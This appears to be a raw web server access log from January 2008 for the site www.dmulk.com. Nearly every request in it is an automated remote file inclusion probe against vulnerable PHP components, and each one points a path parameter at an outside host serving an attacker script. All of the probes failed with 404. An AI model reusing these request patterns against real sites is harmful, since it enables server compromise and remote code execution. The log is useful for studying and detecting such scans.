70.87.175.3 - - [31/Jan/2008:06:32:41 -0800] "GET /logs/access_071230.log/vwar/convert/mvcw.php?step=1&vwar_root=http://goracafe.freehostia.com/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.175.3 - - [31/Jan/2008:06:32:42 -0800] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://goracafe.freehostia.com/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.175.3 - - [31/Jan/2008:06:32:42 -0800] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://goracafe.freehostia.com/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.86.232.194 - - [31/Jan/2008:06:34:26 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.86.232.194 - - [31/Jan/2008:06:34:26 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.200.76.198 - - [31/Jan/2008:06:42:24 -0800] "GET /logs/access_080106.log//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.76.198 - - [31/Jan/2008:06:42:24 -0800] "GET //administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.76.198 - - [31/Jan/2008:06:42:24 -0800] "GET /logs//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.161.218 - - [31/Jan/2008:06:43:12 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.161.218 - - [31/Jan/2008:06:43:14 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.161.218 - - [31/Jan/2008:06:43:14 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.194.218 - - [31/Jan/2008:06:43:15 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.194.218 - - [31/Jan/2008:06:43:15 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.194.218 - - [31/Jan/2008:06:43:15 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.22.162.60 - - [31/Jan/2008:06:43:27 -0800] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.44.50 - - [31/Jan/2008:06:43:30 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.44.50 - - [31/Jan/2008:06:43:30 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.44.50 - - [31/Jan/2008:06:43:30 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.157.122.154 - - [31/Jan/2008:06:43:36 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.93.25.2 - - [31/Jan/2008:06:43:36 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.25.2 - - [31/Jan/2008:06:43:37 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.25.2 - - [31/Jan/2008:06:43:37 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.157.122.154 - - [31/Jan/2008:06:43:37 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.157.122.154 - - [31/Jan/2008:06:43:37 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.10.6.66 - - [31/Jan/2008:06:43:50 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [31/Jan/2008:06:43:50 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [31/Jan/2008:06:43:50 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.86.232.194 - - [31/Jan/2008:06:44:37 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://203.71.212.3/www/Safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [31/Jan/2008:06:44:39 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.85.198.234 - - [31/Jan/2008:06:45:21 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/bujankgilo/bom.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.0.141.110 - - [31/Jan/2008:06:45:46 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [31/Jan/2008:06:45:47 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [31/Jan/2008:06:45:48 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
203.86.232.194 - - [31/Jan/2008:06:46:16 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://203.71.212.3/www/Safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.231.170.10 - - [31/Jan/2008:06:46:49 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.231.170.10 - - [31/Jan/2008:06:46:50 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.231.170.10 - - [31/Jan/2008:06:46:51 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.86.232.194 - - [31/Jan/2008:06:46:52 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://203.71.212.3/www/Safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.144.55.219 - - [31/Jan/2008:06:47:18 -0800] "GET /logs/access_071229.log///////////////includes/functions_admin.php?phpbb_root_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.144.55.219 - - [31/Jan/2008:06:47:18 -0800] "GET ///////////////includes/functions_admin.php?phpbb_root_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.144.55.219 - - [31/Jan/2008:06:47:18 -0800] "GET /logs///////////////includes/functions_admin.php?phpbb_root_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.13.250.115 - - [31/Jan/2008:06:48:38 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.250.115 - - [31/Jan/2008:06:48:38 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.250.115 - - [31/Jan/2008:06:48:38 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.54.72.151 - - [31/Jan/2008:06:48:39 -0800] "GET /logs/access_080103.log//components/com_articles.php?absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.44.50 - - [31/Jan/2008:06:48:40 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.54.72.151 - - [31/Jan/2008:06:48:40 -0800] "GET //components/com_articles.php?absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.54.72.151 - - [31/Jan/2008:06:48:41 -0800] "GET /logs//components/com_articles.php?absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
75.125.161.218 - - [31/Jan/2008:06:48:43 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.194.218 - - [31/Jan/2008:06:48:45 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.74.145.108 - - [31/Jan/2008:06:49:04 -0800] "GET /index1.php?=http://www.halfmanhalfhorse.com/res? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
80.74.145.108 - - [31/Jan/2008:06:49:04 -0800] "GET /logs/index1.php?=http://www.halfmanhalfhorse.com/res? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
63.206.47.130 - - [31/Jan/2008:06:49:11 -0800] "GET /plans/ HTTP/1.1" 200 974 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
63.206.47.130 - - [31/Jan/2008:06:49:23 -0800] "GET /plans/A2_MASTER_SUITE_PLAN.pdf HTTP/1.1" 200 1179648 "http://www.dmulk.com/plans/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
216.117.128.45 - - [31/Jan/2008:06:49:41 -0800] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.206.47.130 - - [31/Jan/2008:06:49:50 -0800] "GET /plans/A2_MASTER_SUITE_PLAN.pdf HTTP/1.1" 206 1546728 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
69.93.25.2 - - [31/Jan/2008:06:50:33 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [31/Jan/2008:06:50:53 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [31/Jan/2008:06:50:53 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [31/Jan/2008:06:50:53 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.22.126 - - [31/Jan/2008:06:52:13 -0800] "GET /megumi/?D=D HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.86.232.194 - - [31/Jan/2008:06:53:08 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://203.71.212.3/www/Safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.157.122.154 - - [31/Jan/2008:06:53:17 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.10.6.66 - - [31/Jan/2008:06:54:26 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.237.144.235 - - [31/Jan/2008:06:54:45 -0800] "GET //com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.244.196.210 - - [31/Jan/2008:06:54:55 -0800] "GET /logs/access_080117.log//com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.fidanquetravel.com/images/PDF/foggian.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.244.196.210 - - [31/Jan/2008:06:54:56 -0800] "GET //com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.fidanquetravel.com/images/PDF/foggian.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.244.196.210 - - [31/Jan/2008:06:54:56 -0800] "GET /logs//com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.fidanquetravel.com/images/PDF/foggian.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.54.72.151 - - [31/Jan/2008:06:55:29 -0800] "GET /logs/access_080103.log//modules/Neos_Chronos/header.php?base_folder=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.54.72.151 - - [31/Jan/2008:06:55:29 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.54.72.151 - - [31/Jan/2008:06:55:30 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.208.9.47 - - [31/Jan/2008:06:55:45 -0800] "GET //com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.208.9.47 - - [31/Jan/2008:06:56:38 -0800] "GET /logs/access_080117.log//com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.208.9.47 - - [31/Jan/2008:06:56:39 -0800] "GET /logs//com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.237.144.235 - - [31/Jan/2008:06:56:52 -0800] "GET /logs/access_080117.log//com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [31/Jan/2008:06:56:53 -0800] "GET /logs//com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [31/Jan/2008:06:57:10 -0800] "GET /logs/access_071230.log//com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
70.85.198.234 - - [31/Jan/2008:06:57:48 -0800] "GET /logs/access_080117.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/bujankgilo/bom.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.198.234 - - [31/Jan/2008:06:57:48 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/bujankgilo/bom.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.0.141.110 - - [31/Jan/2008:06:58:03 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
200.54.72.151 - - [31/Jan/2008:07:01:19 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.231.170.10 - - [31/Jan/2008:07:04:12 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.208.9.47 - - [31/Jan/2008:07:04:16 -0800] "GET /logs/access_071230.log//com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.20.144 - - [31/Jan/2008:07:08:21 -0800] "GET /?S=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.205.186.244 - - [31/Jan/2008:07:11:04 -0800] "GET //impex/ImpExData.php?systempath=http://www.das-gruene-eckchen.de/wbblite/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
193.205.186.244 - - [31/Jan/2008:07:11:04 -0800] "GET /logs//impex/ImpExData.php?systempath=http://www.das-gruene-eckchen.de/wbblite/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
72.47.202.20 - - [31/Jan/2008:07:12:25 -0800] "GET //administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
72.47.202.20 - - [31/Jan/2008:07:12:26 -0800] "GET /logs//administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
67.18.136.2 - - [31/Jan/2008:07:12:58 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.223.116.60 - - [31/Jan/2008:07:15:51 -0800] "GET /logs/access_080117.log/index.php?body=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.116.60 - - [31/Jan/2008:07:15:52 -0800] "GET /index.php?body=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.116.60 - - [31/Jan/2008:07:15:52 -0800] "GET /logs/index.php?body=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.142.220.82 - - [31/Jan/2008:07:16:53 -0800] "GET /logs/access_080117.log//com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.142.220.82 - - [31/Jan/2008:07:16:54 -0800] "GET //com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.142.220.82 - - [31/Jan/2008:07:16:56 -0800] "GET /logs//com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.25.195.72 - - [31/Jan/2008:07:18:09 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.25.195.72 - - [31/Jan/2008:07:18:09 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.25.195.72 - - [31/Jan/2008:07:18:09 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.116.60 - - [31/Jan/2008:07:18:21 -0800] "GET /logs/access_071225.log/index.php?body=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.76.198 - - [31/Jan/2008:07:19:13 -0800] "GET /logs/access_080106.log//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.76.198 - - [31/Jan/2008:07:19:14 -0800] "GET //administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.76.198 - - [31/Jan/2008:07:19:14 -0800] "GET /logs//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.23.139 - - [31/Jan/2008:07:19:37 -0800] "GET /minamijewelry/kanji1.psd HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.244.196.210 - - [31/Jan/2008:07:19:47 -0800] "GET /logs/access_071230.log//com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.fidanquetravel.com/images/PDF/foggian.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.31.242.2 - - [31/Jan/2008:07:22:27 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.shaunabanks.com/ct/includes/gif2png/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
194.31.242.2 - - [31/Jan/2008:07:22:27 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.shaunabanks.com/ct/includes/gif2png/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
208.99.194.216 - - [31/Jan/2008:07:22:35 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
208.99.194.216 - - [31/Jan/2008:07:22:37 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
209.25.195.72 - - [31/Jan/2008:07:22:40 -0800] "GET /logs/access_071228.log/modules/My_eGallery/index.php?basepath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.59.71.229 - - [31/Jan/2008:07:24:05 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
